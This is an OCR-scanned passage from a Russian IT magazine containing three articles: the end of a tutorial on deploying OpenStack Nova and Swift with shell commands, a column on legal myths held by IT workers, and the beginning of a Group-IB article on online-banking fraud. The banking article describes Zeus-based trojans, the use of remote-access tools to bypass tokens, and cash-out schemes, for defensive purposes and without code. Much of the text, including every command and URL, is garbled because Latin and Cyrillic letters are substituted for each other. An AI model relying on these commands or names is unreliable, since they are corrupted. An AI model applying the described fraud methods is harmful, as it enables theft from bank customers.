ватель может подключиться к ВМ, а всю деятельность 
по поддержанию ее в работоспособном состоянии, 
выделении дискового пространства, маршрутизации 
сетевых пакетов и прочую черную работу берет на себя 
система. 

Стоит заметить, что облачная инфраструктура на осно- 
ве ОрепЗгаск получается очень гибкой и управляемой. 
Компоненты системы полностью обособлены друг от 
друга и общаются только с помощью отправки асинх- 
ронных сообщений или протокола НТТР. Уже настро- 
енная и работающая система легко выдержит любые 
изменения в своем дизайне и не потребует много време- 
ни на переконфигурирование. Кроме того, ОрепЗтск не 
замкнут сам в себе и везде, где это возможно, исполь- 
зует сторонние продукты. Для его управления можно 
использовать стандартные клиенты сервиса Атагоп 
ЕС2, а для запуска виртуальных машин применять на- 
иболее удобные в данном конкретном случае системы 
виртуализации (на сегодня поддерживаются КѴМ, ЮМЬ, 
ХЕЫ, НурегѴ и цент) . 

5ѵѵіЙ — безграничное 
хранилище 

Зѵѵііг (ОрепЗшск ОЪуес! Зшга^е) — это полностью рас- 
пределенное, отказоустойчивое высоконадежное храни- 
лище данных, созданное по образу и подобию Атагоп 53. 
Зѵѵій почти полностью основан на наработках компании 
Каскзрасе. 

Система состоит из четырех основных компонентов: 

• прокси-сервер (Ргоху Зегѵег), объединяющий все 
остальные компоненты системы вместе; 

• объектный сервер (ОЪіесі: Зегѵег), ответственный за 
хранение данных; 

• контейнерный сервер (Сошаіпег Зегѵег), ответствен- 
ный за отдачу списка объектов; 

• сервер аккаунтинга (Ассоиш Зегѵег), отдающий лис- 
тинги контейнеров для конкретного аккаунта. 

Типичная Зѵѵій-инфраструктура представляет собой 
кластер, одна из машин которого выполняет функции 
прокси-сервера, несколько машин работают в качестве 
контейнерных серверов и серверов аккаунтинга, а все 
остальные (сотни и тысячи машин) представляют собой 
контейнерные серверы. 




НТТР://ѴѴѴШ 



■ ■ 

> Ііпкз 

• Описание архи- 
тектуры ІМоѵа: Ьйр:// 
поѵа.орепзіаск.огд/ 
поѵа.сопсерІз.ЫтІ : 

• Руководство 
администратора 
N оѵа : Ьйр://поѵа. 
орепзіаск.огд/ 
асітіпдиісіе/іпсіех. 
ЫтЦ ; 



• Руководство по 
созданию ІМоѵа- 
кластера: Шр:// 
ѵѵікі.орепзіаск. 
огд/ІМоѵаІпзІаІІ-/ 
МиШрІеЗегѵег : 

• Описание архи- 
тектуры ЗѵѵІД: Шр:// 
зѵѵій.орепзіаск. 
огд/оѵегѵіеѵѵ 
агсЫіесІиге.ЫтІ . 




ОрепЗіаск подде- 
рживает гибкие 
дисковые квоты, 
пользовательские 
роли и различные ог- 
раничения прав, так 
что его вполне можно 
использовать для 
создания публичных 
облачных сервисов. 
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Ёім;л-ЬинІІЕ>-І«іу(! -1 ішацеъ/дкі- |ии ] іі/ 1 гшауе *р кипе! --киіші. Ьгее ядро И раМДИСК 
СЫіск іпд I таде К заг руз Ке в облако 

Ііггігні ітпде г/ 

ЁпсгцрМпо !•№ 

УрІіШпу Івд^. , 

Исіг I : \+*т пиЕ . | к» Е . В 

отгаигаі іющтезі /і*р/китеІ лапкезі 

.|Ш&]313;"$ еиса-Вітіае-іін^ -I іічди/агі - іус Ід/ігтвдр -р гащйІйЧс — гвядігк Іше 

□“мчіИіН] I ггыі |к' 

Іг^МРк) ІЯ іде 

Епоч[р1 Іп[| кнвдѵ 

Брітіпд імде.., . 

РягІ: ГііиШ^к.рыгі .Й 

Еинега! іт яиэп I Гее I / 1 ігр/гаий I гл . шп I г п^і . ит I 

Іітітгі | 



Прокси-сервер поддерживает внешний КеЗТ-йіІ АРІ, реализован- 
ный в рамках протокола НТТР. Поэтому запрос доступа к объектам 
внутри хранилища выглядит очень наглядно и просто: 

СЕТ ЫсЕр: //зхѵі^Е .йозЕ . сош/ѵІ/ассоипЪ/сопйаіпег/оЪ] есЕ 

Здесь ассоиш — это пользовательский аккаунт, сошаіпег — про- 
странство имен, используемое для классификации данных, а оЪіесІ: 
— непосредственно данные (или, другими словами, файл). 
Прокси-сервер использует так называемые кольца (гіп^з) для по- 
иска реального положения данных в кластере. Это своего рода база 
данных, описывающая то, где на самом деле расположены данные. 
Она модифицируется при каждой записи новых данных в хранили- 
ще, их удаления или выходе узлов из строя. Для аккаунтов, контей- 
неров и объектов предусмотрены отдельные кольца. 

Объектные серверы — наиболее важный компонент Зѵѵій-клас- 
тера. Они отвечают за хранение и отдачу данных. Любые объекты 
хранилища в конечном счете оседают на жестких дисках этих серве- 
ров, которые записывают данные в обычные файлы, сопровождая 
их метаданными, записываемыми в расширенные атрибуты файлов 
(хашг) .Надежность хранения данных достигается за счет дублиро- 
вания сразу на несколько серверов, так что если один из них выйдет 
из строя, система сможет восстановить данные с другого сервера и 
вновь продублировать их. По умолчанию система создает три копии 
каждого объекта, так что в качестве железной составляющей класте- 
ра можно использовать даже самые дешевые машины, не снаб- 
женные КАЮ-контроллерами. Один из основных плюсов системы 
состоит в ее прозрачной масштабируемости. Расширить хранилище 
можно, просто подключив новый узел к кластеру, а всю остальную 
работу по его синхронизации с хранилищем возьмет на себя Зѵѵій. 
Лучше всего этот кластер подходит для хранения таких данных, 
как образы виртуальных машин (собственно, для этого он и был 
создан), банки фотографий, электронные письма, бэкапы и тому 
подобное. 

Пробуем 

ОрепЗізаск — сложная система, для описания установки и исполь- 
зования которой потребовалась бы не одна статья, поэтому мы не 
будем углубляться в детали, а просто посмотрим, насколько быстро 
можно развернуть облачный сервис на локальной машине. 

С помощью Ыоѵа это довольно просто сделать, и нам даже не понадо- 
бится помощь Зѵѵііт, мы просто установим все компоненты системы 
на одну машину и посмотрим, как они функционируют вместе. В 
дальнейшем инфраструктуру можно будет расширить до несколь- 
ких машин, добавив к ней распределенное хранилище данных, но 
это тема для отдельной статьи. 

Несмотря на свою молодость, Ыоѵа и Зѵѵійуже успели попасть в 
официальные репозитории некоторых дистрибутивов, поэтому для 
установки нужных нам компонентов можно использовать стандарт- 
ный менеджер пакетов: 



ѵ**< 




Архитектура Ыоѵа 

$ зисіо арЕ-деЕ іпзЕаІІ гаЪЪіЕгтд-зегѵег \ 

гесііз-зегѵег 

$ зисіо арЕ-деЕ іпзЕаІІ поѵа-арі \ 

поѵа-окд есЕзЕоге поѵа-сотриЕе \ 
поѵа-зсйесіиіег поѵа-пекѵгогк \ 
еиса2оо1з ипгір 

Фактически уже после установки система полностью готова к рабо- 
те, остается только завести учетную запись суперпользователя: 

$ зисіо поѵа-шападе изег асішіп ѵазуа 

И создать новый проект, в рамках которого мы будем производить 
все дальнейшие эксперименты: 

$ зисіо поѵа-шападе ргозесЕ сгеаке \ 
ехрегітепкз ѵазуа 

Далее просим систему запаковать данные, необходимые для досту- 
па к проекту, в гір-архив: 

$ зисіо поѵа-шападе рго^еск гіркііе \ 
ехрегішепЕз ѵазуа 

Теперь эти данные можно использовать, чтобы управлять работой 
облака с помощью ЕС2-совместимых инструментов. Для этого рас- 
пакуем архив и выполним команды, прописанные в файле поѵагс: 
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Добавляем нового 
пользователя 
и создаем проект 



Загружаем ядро 
и рамдиск в облако 



ІІпЙШЗ:"’? еиса-ирІойгі-ЬипсІІе -іл /Ішр /кегпеі .шапі Ге5І .хті -Ь шуЬискеІ 

ПЬепк Іпд Ікнпкеі : шцііипкеі 

Сгсвііпд Ьискеі : яцЬискеі 

Ііріотйпу пюпі ГеьЛ Гііе 

иріоасііпд рагі; кегпеі .рзгі . В 

Цріаайвй іпиде об ігуЬиске! /кегпеі .тапі Іезі .хті 

Дтв1313:”$ еисо- чр I іий-Ьши! I е -т /Ітр/гаікіі ьк.пип [ ГеьД .хті -Ь туішскеі 
ПЬегИпд Ьппкеі ; шуЬиске* 

Уріоасііпд пипІГеБІ Піе 

Уріиаіііпд рвгі: г'яімііік .рпг І .Й 

ІІрІПіКІпР ішйпе аз иіуЕіііПкйІ/гдпи'Ііяк.іглпі Гез) .хіііі 

ЦпйШЗ:“$ і 



$ ипгір поѵа.гір 
$ . поѵагс 

Чтобы протестировать работу сервиса, нам понадобится ЕС2-образ 
виртуальной машины. 

Минимальный Ьіпих-образ можно получить на сайте Каскзрасе: 

$ мдек Ьккр: //с24770б2 . ссіп . сіошііііез . гаскзрасесіоисі. 
сот/ ітадез . кд 2 

Распаковываем : 

$ Баг — Х 2 і ітадез . Ьд г 

Образ необходимо зарегистрировать в облаке, поэтому делаем 
следующее: 

1 . Создаем манифесты для ядра и рамдиска: 

$ еиса-ЬипсіІе-ітаде -і ітадез /акі-1исіс1/ітаде \ 

-р кегпеі --кегпеі кгие 

$ еиса-ЬипсіІе-ітаде -і ітадез/агі-іисісі/ітаде \ 

-р гатсіізк --гатсіізк кгие 

2. Заливаем ядро и рамдиск в облако: 

$ еиса-ир1оас1-Ъипс11е -т /Бтр/кегпеі .тапііезк .хті -Ь 
туЬискек 

$ еиса-иріоасі-ЪипсіІе -т /ктр/гатсіізк.тапііезк .хті -Ь 
туЬискек 

3. Регистрируем ядро и рамдиск: 

$ еиса-гедізкег туЬискек /кегпеі .тапііезк . хті 
$ еиса-гедізкег туЪискек/гатсіізк.тапііезк .хті 

Эти команды должны выдать на экран идентификаторы ядра и рамдис- 
ка внутри облака. Их нужно запомнить или скопировать. 

4. Подготавливаем образ машины, используя зарегистрированные в 
прошлом шаге ядро и рамдиск: 

$ еиса-ЪипсІІе-ітаде -і ітадез /аті- Б іпу/ітаде -р тасЪіпе \ 



--кегпеі ІБ-ядра --гатсіізк ІБ-диска 

5. Загружаем образ машины в облако: 

$ еиса-ирІоасі-ЬипсіІе -т /Бтр/тасМпе .тапііезБ .хті -Ь 
туЪискеБ 

6. Регистрируем образ машины и запоминаем ее идентификатор: 

$ еиса-гедізБег туЪискеБ /тасЪіпе .тапііезБ .хті 

Теперь можно запустить виртуальную машину на исполнение, но сна- 
чала мы должны получить 55Н-КЛЮЧ для доступа к нашим машинам: 

$ еиса-асісі-кеураіг тукеу > тукеу .ргіѵ 
$ сЪтосІ 600 тукеу. ргіѵ 

Запускаем виртуальную машину: 

$ еиса-гип-іпзБапсез ІБ-машины --кегпеі ІБ-ядра \ 
--гатсіізк ІБ-рамдиска -к тукеу 

Смотрим состояние машины: 

$ еиса-сІезсгіЪе-іпзБапсез 

Проверяем, была ли она корректно запущена: 

$ ѵігзЪ. ІізБ 

Подключаемся к машине по 38Н: 

$ еиса-аиБЪогіге -Р Бср -р 22 ЪеБаиІБ 
$ ззЪ -і тукеу .ргіѵ гооБ@10 .0.0.3 

Убиваем машину: 

$ иса-БегтіпаБе-іпзБапсез ІБ-машины 

Заключение 

Описанное в статье — только вершина айсберга под названием 
ОрепЗшск. Чтобы описать систему полностью, понадобилась бы целая 
книга и огромное количество свободного времени. Ноя надеюсь, что 
и эта небольшая порция информации поможет тебе начать освое- 
ние этого, без сомнения, грандиозного продукта, который в скором 
времени вполне может стать стандартом в среде открытых облачных 
сервисов, □с 
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ЗУИ/АСК 



■ ■ Николай Николаевич Федотов, главный аналитик компании ІпІоѴѴаІсЬ ІппШпп.ги, іп^оѵѵаісіі.ііѵе^игпаі.сот 



Мифы 



и легенды 

еменных 
шников 



совр< 

аити 



Восемь правовых сказок, в которые все еще 
верят большие мальчики 

Есть знания, а есть верования. А еще есть глупость — это когда не отличают первое от второго. 
Знать, что именно ты не знаешь — это Конфуций и называл «правильным отношением» («Лунь 
Юй», 2, 17). Его главный мировоззренческий оппонент Лао Цзы говорил практически то же самое: 
«Кто болеет, зная о своей болезни, тот не болен» («Даодэцзин», 1, 71). 



*■ 



К сожалению, наш брат компьютерщик редко постигает эту мудрость 
и относится к гуманитарным областям немного свысока. И самоуве- 
ренно суется на чужое поле и в чужие правила. А потом удивляется, 
что там его обыгрывают. 

Вот несколько типичных заблуждений айтишников, относящихся к 
правовой сфере. Подсчитай, в какой процент из них ты веришь. 

• Программы бывают контрафактными; 

• правильно составленный документ может избавить сисадмина от 
ответственности; 

• если все зашифровать, то не будет доказательств; 

• в суде можно доказать невиновность; 

• программу можно запатентовать; 

• надписи «(с) Соругі^ІЩ» и «АП гі^ІИз гезегѵесі» имеют смысл; 

• свободные программы можно использовать без заключения лицен- 
зионного договора; 

• место совершения компьютерного (кибер-) преступления находит- 
ся в месте расположения сервера. 

Когда автор зачитал эти утверждения в компании айтишников, 
то по меньшей мере на шесть из восьми утверждений он получил 
недоуменное: «Разве это миф? Это ж так и есть!». А теперь давайте 
разберем все эти утверждения с точки зрения современного права. 

Программы бывают 
контрафактными 
(нелицензионными, пиратскими) 

Хотя выражение «контрафактная/нелицензионная программа» 
широко применяется, оно не является корректным. Термин «кон- 
трафактный» вообще неприложим к объекту интеллектуальной собс- 
твенности. Он может быть применен только к носителю такого про- 
изведения. Статья 1252 ГКдает такое определение контрафактного 
носителя: «материальный носитель, изготовление, распространение 
или иное использование . . . которого приводят к нарушению исклю- 
чительного права на результат интеллектуальной деятельности». Как 
видно из определения, контрафактность — не свойство программы, 
ее конкретного экземпляра или даже носителя. Контрафактность 
— это характеристика правоотношений, которые устанавливаются 



вокруг данного носителя. Люди договорились, заключили, к приме- 
ру, лицензионный договор — носитель в тот же момент стал нормаль- 
ным (не контрафактным) . Истек срок действия лицензии или были 
нарушены ее условия — бац, и тот же самый носитель с тем же самым 
ни на бит не изменившимся ПО превратился в контрафактный. 
Понятно, что, исследовав программу или ее носитель, невозможно 
установить, в каких отношениях состоят или не состоят правообла- 
датель с пользователем. Поэтому «экспертиза на контрафактность» 
— это пугало, фарс или даже откровенное нарушение закона. Кстати, 
для разъяснения последнего факта Верховный Суд РФ даже выпустил 
постановление № 14 от 26 апреля 2007 года. Не помогло. 

То или иное техническое состояние копии программы или носителя 
не может свидетельствовать о юридических взаимоотношениях с 
правообладателем. Поэтому и «признаков контрафактности» тоже не 
существует: не могут существовать технические признаки правового 
явления; нельзя искать признаки какого-либо статуса вдали от того 
места, где этот статус устанавливается. 

Правильно составленный 
документ может избавить 
сисадмина от ответственности 

К автору иногда обращаются за консультацией инсталляторы, сай- 
товладельцы или создатели программ. «Чего бы такого, — спрашива- 
ют они, — написать в дисклеймере, договоре или лицензии, чтобы не 
отвечать за нарушение авторских прав, неправомерный доступ или 
вредоносные программы?» Автор им неустанно объясняет, что от- 
ветственность определяется только законом и ничем иным. Договор 
между сторонами имеет значение лишь в тех случаях, когда закон 
прямо на него указывает. А это — случай редкий. Таким образом, лю- 
бые «заклинания» — что сказанные, что написанные, что «отлитые в 
граните» — не имеют значения для квалификации деяния. Это даже 
не норма. Это — принцип. Он именуется принципом законности и 
наряду с принципами справедливости и правосудия составляет базис 
современного права. 

Обратившиеся за консультацией обычно кивают и. . . спрашивают: 
«Так все-таки, что написать в дисклеймере?». В прошлой статье автор 
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уже упоминал, что применительно к сисадмину, который понаставил 
в офисе пиратских программ, любая бумажка о «переложении от- 
ветственности» сыграет против него. Ответственность за нарушение 
авторских прав никуда не переложится, но у обвинения появится 
документ, подтверждающий сговор и заранее обдуманные намере- 
ния нарушить закон. 

Если все зашифровать, то не бу- 
дет доказательств 

Для начала история из практики. Подозреваемый по делу о непра- 
вомерном доступе к компьютерной информации (ст. 272 УК РФ) на 
первом допросе гордо заявил, что у обвинения нет и не может быть 
никаких доказательств. Все его носители информации, изъятые 
при обыске, были зашифрованы стойким алгоритмом, который 
подозреваемый считал невзламываемым. Проверить стойкость 
шифрования в тот раз не довелось, поскольку ломать защиту никто 
даже не пытался. 

Следователь просто допросил свидетелей. Утверждая, что доказа- 
тельств нет, злоумышленник отчего-то забыл, что обо всех своих 
«успехах» сам рассказывал (и даже показывал) своим друзьям и 
знакомым. Которые, конечно же, не стали играть в мафию с обетом 
молчания «омерта», а все виденное и слышанное от «хакера» на 
допросах выложили. 

Свидетельские показания традиционно являются главным доказа- 
тельством на любом суде и ценятся много выше всех этих «совре- 
менных штучек»: экспертиз, заключений специалиста, осмотров 
компьютера и так далее. На одних лишь показаниях свидетелей 
судебные дела решались тысячи лет. И ныне решаются в достаточ- 
ном количестве. А зашифрованный «по самое не хочу» компьютер 
останется вечным памятником бессмысленному технократическому 
подходу. 

Содержимое жесткого диска, конечно, может оказаться неплохим 
источником улик. Однако главным оно не было и не будет. Места 
«царицы доказательств», а также ее приближенных, прочно заня- 
ты. Правовые методы XXI века мало изменились по сравнению с 
технологиями юстиции, которые известны со времен Хаммурапи и 
Цицерона. 



В суде можно доказать 
невиновность 

В разных странах сложились различные распределения ролей между 
правоохранительными органами. Где-то на судебном заседании 
проводится полноценное расследование, устанавливаются факты, 
появляются и исследуются улики. Суд при этом может происходить 
довольно драматично, изобиловать сюжетными ходами и неожидан- 
ными ситуациями. В других странах вся детективная составляющая 
сдвинута на этап предварительного следствия, а на суде неожидан- 
ности исключены, суд выполняет роль финальной формальности. 
Россия относится ко второй группе. Все факты, все доказательства и 
их интерпретация должны быть готовы до суда. Полномочия судьи 
— рассмотреть представленные доказательства и вынести решение, 
которое фактически предопределено, поскольку ничего нового в 
материалах дела появиться не может. Так было и во времена СССР, 
когда судьи были значительно более независимы, чем ныне. Так было 
и при царе-батюшке. Однако основной источник знаний для про- 
стого народа — голливудские фильмы — опираются на совсем иную 
традицию. В англосаксонской системе роль следователя значительно 
меньше, а иногда он и вовсе отсутствует. Фактически следствие про- 
водит судья, он же принимает все основные решения по ходу дела. 
Насмотревшись и начитавшись зарубежной криминальной прозы, 
русский человек делает странные выводы. И, оказавшись в роли 
подозреваемого, начинает себя странно вести. Да, в российских 
судах доля оправдательных приговоров сейчас составляет 0,8% (и то 
в основном за счет судов присяжных), в советские времена она была 
немногим выше. Потому что дела с недостаточными или неубеди- 
тельными доказательствами в суд просто не отправлялись. Следова- 
тель сам «оправдывает», если убеждается в невиновности или если 
доказательств недостаточно. А в суд поступают только те дела, где 
доводы стороны обвинения убедительны. И судья их штампует. Такая 
система не лучше и не хуже заокеанской, место для справедливости 
в ней предусмотрено. А вот если иметь о ситуации ошибочное пред- 
ставление, можно опоздать со своей защитой, что во многих случаях 
и происходит. Автора неоднократно звали на роль консультанта или 
специалиста по компьютерным преступлениям, когда уголовное 
дело уже в суде. С огромным сожалением приходится отказываться, 
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поскольку «поздно пить «Боржоми»». Такие приглашения исходят от 
стороны защиты. А сторона обвинения, если и обращается за консуль- 
тацией, то на этапе возбуждения уголовного дела или даже раньше — в 
период проведения оперативно-розыскных мероприятий. Тут специа- 
лист действительно может помочь. 

Программу можно запатентовать 

Патентное право (гл. 72 ГК) и авторское право (гл. 70 ГК) — это две раз- 
ных отрасли права и два принципиально различных метода защиты 
интеллектуальной собственности. 

Авторское право возникает в силу создания произведения (в том числе 
программы) и не требует совершения каких-либо формальностей. Па- 
тент выдается в результате процедуры государственной регистрации, 
причем не автору, а заявителю: тут «кто первый встал, того и тапки». 
Авторское право защищает форму произведения и оставляет сво- 
бодным его сущность (идею, описанный способ) . Патентное право 
охраняет именно сущность изобретения, а форма его реализации при 
этом может быть любой. 

Когда выбирали, каким именно институтом следует защищать ком- 
пьютерные программы, пришли к выводу, что авторское право будет 
оптимальным. Иные отрасли интеллектуальной собственности (пра- 
во на товарный знак, на изобретение, на технологию, на селекционное 
достижение и прочее) были признаны неподходящими. 

Поэтому охраняется именно форма программы, то есть ее код (ис- 
полняемый и исходный) . Если тот же самый алгоритм, способ, идею, 
метод осуществить другим кодом, написав его заново (без использова- 
ния фрагментов чужого кода), это будет самостоятельная программа, 
самостоятельный объект авторского права. 

Патенты подходят к защите интеллектуальной собственности совсем 
с иной стороны. Реализовав запатентованный метод в иной форме, 
иными средствами, иным кодом, мы нарушим чужой патент и совер- 
шим правонарушение. Даже если открыли этот способ самостоятель- 
но и независимо. 

Понятно, что патентная защита для ПО подходит плохо. Написал, 
скажем, командир Нортон своего знаменитого N0 с двумя синими 
панельками — и никто другой уже не имел бы права делать также: 
никаких панелек со списком файлов, никаких желтых рамочек на 
синем фоне (по крайней мере, без уплаты Нортону отчислений) . 
Хорошо было бы? Плохо. Поэтому программы в большинстве стран не 
патентуются. 

Однако нашлись четыре «инакомыслящих» страны. В США, Корее, 
Индии и Японии компьютерные программы являются ограниченно 
патентоспособными. Весь остальной мир смотрит на их горький опыт 
и жалеет несчастных софтопроизводителей из этих стран. Живется им 
действительно несладко. Почти все алгоритмы и визуальные решения 
интерфейсов имеют под собой патенты. Практически невозможно ни- 
чего написать, чтобы не наступить на чью-нибудь интеллектуальную 
собственность. Крупные фирмы имеют в активе по нескольку тысяч 
патентов на софт и договариваются с другими крупными о кроссли- 
цензировании. Суть его такова: мы вас не трогаем, вы нас не трогае- 
те. Мелким же производителям договориться сложнее, приходится 
платить. 




Здесь мы имеем дело с типичным обезьянничаньем или, говоря по- 
научному, социальным наследованием. Одни повторяют за другими, 
третьи за четвертыми, а откуда взялась традиция, все уже забыли. 

К счастью, автор раскопал источник и может пролить свет на это 
глупое заклинание «все права защищены». Когда-то давно, в дикие 
раннекопирайтные времена, в одной стране существовал закон: 
авторское право охранялось лишь в том случае, если издатель ставил 
на книге указанную надпись. Норма просуществовала всего несколько 
лет, однако традиция закрепилась. 



Ныне во всем мире авторские права закрепляются за автором в силу 
создания произведения и не требуют исполнения каких-либо фор- 
мальностей (п. 4ст. 1259). 

Надпись «© соругі^ІИ» несет чисто информационный (уведомитель- 
ный) характер: ее форма предписана ст. 1271 ГК, однако ее наличие 
или отсутствие не влечет каких-либо правовых последствий. 

Свободные программы 
не треоуют заключения 
лицензионного договора 

СРЬ, В5Э, СРЭЬ и другие типы «свободных» лицензий — это не отрица- 
ние авторских прав, а обычные лицензионные договоры. Такие же, как 
проприетарные, только с особыми условиями — чаще всего, безвоз- 
мездные. Тем не менее, заключать их надо. Любое использование 
произведения без разрешения правообладателя (то есть без лицензи- 
онного договора) является незаконным и карается. 

Да, тот же Линух или Файрфокс вполне могут быть «нелицензион- 
ными», то есть их использование — незаконным. Если пользователь 
не заключит договор путем нажатия кнопки «согласен» или иным 
приемлемым способом. 

Место совершения 
киберпреступления находится в 
месте расположения сервера 

Закон регулирует отношения между людьми — субъектами права. 
Всякие железки типа сервера, провода, а также байты с битами субъ- 
ектами не являются. Поэтому значение имеет лишь то, где расположен 
человек: нарушитель прав или тот, чьи права нарушены, исполнитель, 
организатор, пособники так далее. Переместив сервер в другую стра- 
ну, мы ничуть не меняем правоотношений между пользователями, 
сайтовладельцами, регистраторами доменов и прочими субъектами 
сложных отношений. Единственное, чего можно достичь таким пере- 
водом, это затруднить сбор доказательств. И то — лишь в том случае, 
когда содержимое сервера является таковым. 

Если, к примеру, один гражданин, находясь на территории РФ, оскор- 
бил публично (ст. 130 УК) другого гражданина, находящегося на той 
же территории, то дело будет решаться исключительно в российской 
юрисдикции по российским законам. При этом никого не интересует, 
какими техническими средствами это оскорбление было донесено 
до публики — звуковыми колебаниями, радиоволнами, буквами на 
бумаге или ІР-пакетами, и по каким проводам и эфирам они пробега- 
ли. Имеет значение лишь местонахождение субъектов права, то есть 
людей. 

Заключение 

Мифы передаются от человека к человеку в ходе практической 
деятельности. Разоблачаются они в ходе глубокого изучения тео- 
рии. Сильная степень твоей мифологизации означает лишь то, что 
ты — практический работник, предпочитающий действовать, а не 
копаться в книгах. Если ограничивать себя единственной областью 
деятельности, своей узкой специализацией, то подобные мифы, на- 
верное, не несут вреда. Риск проявляется лишь при расширении сферы 
интересов.^*: 



Статьи, которые Николай Федотов публикует в этой рубри- 
ке, пишутся исключительно для тебя. Да-да, не прячься за 
страницей с рекламой, именно для тебя. Поэтому не стес- 
няйся, присылай свои вопросы по «айтишному» праву на 
мыло редактора: І020Ѵ8ку@§ате1ап(1.ги. Когда их наберет- 
ся достаточное количество, мы сделаем статью «Правовой 
РА(2», сделанную по вопросам наших читателей. 

Ты спрашиваешь — мы отвечаем. Это справедливо. 
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■ Александр Писемский 6гоир-ІВ, різетзкіуИдгоир-іЬ.ги 




Скажи нет атакам 
на онлайн-банкинг 



Предотвращаем хищения в системе 
дистанционного банковского обслуживания 

Идея написать такую статью у меня зародилась уже достаточно давно. Решающим толчком к 
ее написанию послужило хищение в размере 400 млн рублей, с которым специалистам Сгоир- 
ІВ пришлось иметь дело в декабре 2010 года. Преступление было спланировано и реализовано 
точно так же, как и сотни других подобных инцидентов, случающихся ежедневно по всей России. 
Однако еще ни одно происшествие с системой ДБО, свидетелями которых мы были, не касалось 
таких внушительных сумм. 



В этой статье я хочу рассказать о схемах совершения хищений с 
использованием системы «Интернет-банк» или «Банк-Клиент», а 
также о противоборстве им. При этом мы не будем рассматривать 
случаи, когда за организацией хищения стоит внутренний сотруд- 
ник: это тема, которая заслуживает отдельного рассмотрения. 
Мошенничества в системах дистанционного банковского обслу- 
живания мы начали фиксировать в первой половине 2008 года. 

С тех пор злоумышленники отработали схемы кражи банковских 
ключей и данных для авторизации, а также методы обналич- 
ки денежных средств, что дало им возможность поставить эти 
преступления на поток. За ноябрь 2010 года мы зафиксировали 
76 фактов мошенничества в системах ДБО, 46 из них затрагивали 
юридических лиц. Благодаря оперативной реакции пострадав- 
ших клиентов и банков удалось остановить 35 инцидентов еще до 
момента обналичивания денег, что позволило вернуть их постра- 
давшей стороне. 

Понимание методов совершения 
преступлении 

При восстановлении обстоятельств инцидентов в ходе кримина- 
листических исследований рабочих станций, на которых работали 
с ДБО, тщательному анализу подвергаются журналы межсетевых 
экранов и прокси, а также другие источники информации. Нашими 
экспертами определяются причины инцидента, методы и средства, 
которыми пользовались злоумышленники, хронология их действий. 
Наиболее частый сценарий совершения преступления состоит из 
трех основных этапов: получение информации для доступа в систе- 
му ДБО, проведение мошеннической операции, обналичка денег. 
Рассмотрим каждый из этапов. 

1. Получение информации для доступа в систему ДБО. 

Как я уже говорил, в данной статье мы рассматриваем случаи, когда 
мошенник является внешним лицом по отношению к организации 
или человеку, то есть не имеет физического доступа к авторизаци- 
онным данным системы ДБО. В таких случаях кража данных для 
авторизации (логин/пароль и ключи ЭЦП) производится с помощью 
вредоносного программного обеспечения. Чаще всего это вариа- 
ции хорошо известного трояна 2еи§, доработанные необходимым 
функционалом. 

Как правило, заражение происходит при посещении скомпроме- 
тированного веб-сайта, на котором злоумышленниками были 
внедрены различного рода ійгате- или Іаѵа-скрипты, эксплуатиру- 
ющие незакрытые уязвимости в браузерах или их модулях (АбоЪе 



РІазЬ, АбоЪе Кеабег, баѵа и других) . В ходе эксплуатации уязвимости 
на рабочий компьютер пользователя загружается вредоносное ПО, 
которое детектирует, с какими приложениями работает пользова- 
тель. При обнаружении следов работ с системами ДБО или система- 
ми электронных денег, на компьютер дозагружаются вредоносные 
модули, предназначенные для кражи авторизационных данных. 
Современные трояны имеют широкий функционал и способны 
работать одновременно с несколькими системами ДБО, обеспечи- 
вать возможность удаленного доступа злоумышленника и сокрытие 
следов преступления. 

Как только троян собирает необходимую информацию, он передает 
ее на контроллер ботнета, где она обрабатывается злоумышленни- 
ками. На ботнет-контроллер передается следующие данные: пары 
логин/пароль, ключи ЭЦП, информация о носителе ключей ЭЦП 
(токен, флешка, дискета) . 

2. Проведение мошеннической операции 

При получении данных от трояна, мошенники проверяют получен- 
ные сведения и их достаточность для совершения преступления. 
Здесь особую роль играют средства защиты, применяемые банком 
и его клиентом. Контроль ІР-адресов, наличие токенов или однора- 
зовых паролей меняют подход злоумышленников при дальнейшем 
осуществлении мошенничества. В случае хранения ключей ЭЦП 
на незащищенном носителе (жесткий диск компьютера, флешка, 
дискета, реестр операционной системы) и отсутствия на ДБО-сер- 
вере банка контроля ІР-адресов клиентов злоумышленник может 
отправить мошенническое платежное поручение с любого внешнего 
ІР-адреса, что существенно упрощает задачу. 

Постепенный переход банков на средства двухфакторной аутен- 
тификации заставил злоумышленников искать новые методы 
совершения преступления. Выход был найден. Сейчас наиболее 
распространенным способом обхода применения токенов в качестве 
хранилища ключей ЭЦП служат средства удаленного администри- 
рования, такие как КЭР, ѴЛС, Кабтіп, ТеатѴіеѵѵег. Использование 
средств удаленного администрирования позволяет отправлять 
платежные поручения непосредственно с компьютера бухгалтера, 
в который вставлен токен. При этом часто используется служба 
терминального сервера ѴѴтсІоѵѵз, что позволяет злоумышленнику 
работать параллельно с легитимным пользователем. Для организа- 
ции туннелей до скомпрометированных компьютеров применяются 
общедоступные ѴРЫ-клиенты ОрепѴРЫ и НатасЫ. 

Также активно развивается функционал вредоносного ПО. К нам 
попадают трояны, которые способны самостоятельно работать со 
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смарт-картами и токенами, используя стандартный АРІ ѴѴІпсІоѵѵз. 
Кроме того, троянами производится подмена легитимных платеж- 
ных поручений на мошеннические при отправке их на подпись в то- 
кен, при этом пользователь ДБО видит, как его платежное поручение 
было успешно подписано и отправлено в банк. 

Как только мошенническая операция проведена, и платежное пору- 
чение отправлено, главная задача злоумышленников — ограничить 
доступ легитимного пользователя к системе ДБО. Для этой цели 
могут использоваться различные методы: смена пароля от системы 
ДБО, вывод из строя компьютера клиента банка, БОоЗ -атака на 
ДБО-сервер банка. Чаще всего форматируют жесткий диск пользо- 
вателя или удаляют один из компонентов операционной системы 
(например, Ш 1 Боабег) . Тем временем, пока все силы клиента банка 
брошены на восстановление работоспособности компьютера, де- 
ньги покидают его счет и попадают в руки преступников. 

3. Обналичка 

Этот этап чаще всего отдается на аутсорсинг специализированным 
группам лиц, имеющим тесные связи с организованными преступ- 
ными группировками. Для вывода денег могут использоваться счета 
подставных фирм либо дебетовые карты физических лиц. Схема 
обналички начинает разрабатываться еще во время подготовки 
к краже денег, так как она зависит от суммы денежных средств, 
которую нужно вывести. В случае небольших сумм (до 2 млн рублей) 
чаще всего используются пластиковые карты физических лиц, 
причем предпочтительны те банки, в которых большие лимиты по 
выдаче наличности в банкоматах. В случае крупных сумм использу- 
ется цепочка счетов подставных компаний и физических лиц: в ходе 
переводов сумма дробится для облегчения снятия наличных денег. 

Противодействие 

мошенничеству 

Итак, пришло время понять, как можно защитить свои деньги и 
